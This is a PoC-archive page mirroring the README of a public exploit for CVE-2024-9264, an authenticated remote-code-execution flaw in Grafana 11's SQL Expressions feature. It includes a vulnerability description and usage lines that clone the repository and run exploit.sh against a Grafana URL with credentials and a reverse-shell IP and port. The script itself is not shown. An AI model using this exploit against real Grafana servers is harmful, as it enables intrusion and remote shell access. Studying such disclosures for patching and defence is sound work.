Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-9264 PoC — Grafana SQL Expressions allow for remote code execution

Source
https://github.com/rvizx/CVE-2024-9264
Associated Vulnerability
Title:Grafana SQL Expressions allow for remote code execution (CVE-2024-9264)
Description:The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions.
Description
Authenticated RCE in Grafana (v11.0) via SQL Expressions - PoC Exploit
Readme

# CVE-2024-9264
Authenticated RCE in Grafana (v11.0) via SQL Expressions - PoC Exploit

<br><br>
<div align="center">
  <img width="150" src="https://upload.wikimedia.org/wikipedia/commons/thumb/a/a1/Grafana_logo.svg/512px-Grafana_logo.svg.png?20230113183101" alt="logo"> <br><br>
  <p>CVE-2024-9264 - Grafana v11.0<br>
  <b>Authenticated Remote Code Execution (RCE)</b> <br>
  </p>

![PoC](https://www.zyenra.com/assets/img/grafana-rce.png)
  
</div>

---

### Introduction


CVE-2024-9264 is a critical remote-code-execution and local-file-inclusion flaw introduced in Grafana 11’s experimental “SQL Expressions” feature. The API passes user-supplied SQL straight to the DuckDB CLI without adequate sanitisation, so any authenticated account with Viewer or higher privileges can inject shell commands or read arbitrary files, provided the duckdb binary is in the server’s PATH.

---

### Usage

```bash
git clone https://github.com/rvizx/CVE-2024-9264
cd CVE-2024-9264
chmod +x exploit.sh

# usage
usage: ./exploit.sh <grafana_url> <username> <password> <reverse_ip> <reverse_port>
````

Example:

```bash
./exploit.sh http://grafana.example.com admin LMCOP4X2?29DX2%332! 10.10.10.10 1337
```
File Snapshot

 [4.0K]  /data/pocs/82a8ba52c3abfb452904444bba25f1ba4f483de0
├── [1.9K]  exploit.sh
└── [1.2K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →